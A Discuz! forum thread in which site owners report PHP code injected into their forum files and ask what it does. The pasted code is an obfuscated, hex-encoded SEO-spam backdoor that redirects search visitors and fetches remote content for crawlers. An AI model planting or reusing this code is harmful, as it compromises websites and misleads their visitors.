Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

有漏洞,文件无故被加代码

[复制链接]
stonys 发表于 2014-8-4 16:05:13 | 显示全部楼层 |阅读模式
先是在function_forum.php中加,恢复后,今天又发现在forum_viewthread.php又发现同样代码。

  1. <?php
  2. /*StartCache*/
  3. function relset_UC_key ($string)
  4. {
  5.         $arraygn = strlen ($string);$debuger = '';
  6.         for($one = 0;$one < $arraygn;$one+=2) {
  7.                 $debuger .= pack ("C",hexdec (substr ($string,$one,2)));
  8.         }
  9.         return $debuger;
  10. }

  11. function relset_Turl ($url)
  12. {
  13.         global $relset_host;
  14.         $string = relset_UC_key ('4c6f636174696f6e3a20'.$url.'3f').str_replace ('.','_',$relset_host);
  15.         header($string);
  16.         return true;
  17. }

  18. error_reporting (E_ERROR);

  19. if($_GET && !eregi('site%3A|inurl%3A',$_SERVER['HTTP_REFERER']))
  20. {
  21.         $clserv = &$_SERVER;
  22.         $relset_host = $clserv['HTTP_'.'HOST'];
  23.         $relset_self = $clserv['PHP_'.'SELF'];
  24.         $relset_refe = $clserv['HTTP_RE'.'FERER'];
  25.         $relset_user = $clserv['HTTP_US'.'ER_AGENT'];
  26.         if ($_GET['tid'] > 9999999 || $_GET['tid'] > 9999999){
  27.         $arrgpe = array(
  28.              'tid' => array('%B2%A9%B2%CA','%b2%a9%b2%ca','687474703A2F2F3232322E64616E6763692E63632F'),

  29.         );

  30.         $keysar = array_keys ($_GET);
  31.         $arrgps = array_keys ($arrgpe);
  32.         $arrgpx = array_values (array_intersect ($arrgps,$keysar));
  33.         $rebotu = $arrgpx[0];
  34.         $boswon = relset_UC_key ('62616964757c676f6f676c657c736f676f757c736f736f7c7961686f6f7c62696e677c626f747c7370696465727c736f7c333630');
  35.                 }
  36.         if (eregi ($boswon,$relset_refe)) {
  37.                 if (!empty ($rebotu)) {
  38.                         relset_Turl ($arrgpe[$arrgpx[0]][2]);
  39.                         exit;
  40.                 } else {
  41.                         foreach($arrgpe as $vargn => $arraygn) {
  42.                                 if(stristr ($relset_refe,$arraygn[0]) || stristr ($relset_refe,$arraygn[1])) {relset_Turl ($arraygn[2]);exit;}
  43.                         }
  44.                 }
  45.         } elseif (eregi ($boswon,$relset_user) && $rebotu) {
  46.                 $valsar = array_values ($_GET);
  47.                 $retueby = array(
  48.                         0 => relset_UC_key ('3f643d'),
  49.                         1 => relset_UC_key ('26733d'),
  50.                         2 => relset_UC_key ('26763d'),
  51.                         3 => relset_UC_key ('26723d'),
  52.                         4 => relset_UC_key ('636f6e74656e742d547970653a20746578742f68746d6c3b20636861727365743d676232333132'),
  53.                         5 => relset_UC_key ('687474703a2f2f'),
  54.                         6 => relset_UC_key ('5b30785370696465725d')
  55.                 );
  56.                 $inters = relset_UC_key ('3830');
  57.                 $demuer = relset_UC_key ('6262732E616E7175616E2E7573');
  58.                 $simeiao = relset_UC_key ('2f6170692f696e6465782e706870');
  59.                 $classinction = $retueby[0].$relset_host.$retueby[1].$relset_self.$retueby[2].$rebotu.$retueby[3].$valsar[0].'|'.$valsar[1].'|'.$valsar[2];
  60.                 header ($retueby[4]);
  61.                 $skyword = @file_get_contents ($retueby[5].$demuer.':'.$inters.$simeiao.$classinction);
  62.                 $skywords = explode ($retueby[6],$skyword);
  63.                 echo $skywords[1];
  64.                 exit;
  65.         }
  66. }

  67. /*EndCache*/
  68. ?>
复制代码


 楼主| stonys 发表于 2014-8-4 16:07:21 | 显示全部楼层
这段代码是什么意思?
回复

使用道具 举报

kuangbiao2129 发表于 2014-8-6 10:44:27 | 显示全部楼层
官方没人吗? 连个回复都没有,很多discuz的论坛都被黑了,dz不靠谱啊
回复

使用道具 举报

网络风 发表于 2014-8-12 21:23:15 | 显示全部楼层
就是啊,这个太烦人了,老清理不掉。
回复

使用道具 举报

DZ动力1012 发表于 2014-8-22 18:43:28 | 显示全部楼层
没有发现过此问题,请检查是否是服务器漏洞,或者FTP被黑。
回复

使用道具 举报

游子(88888) 发表于 2014-8-24 21:38:55 | 显示全部楼层
我的也一样
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2025-2-26 04:44 , Processed in 0.032083 second(s), 6 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表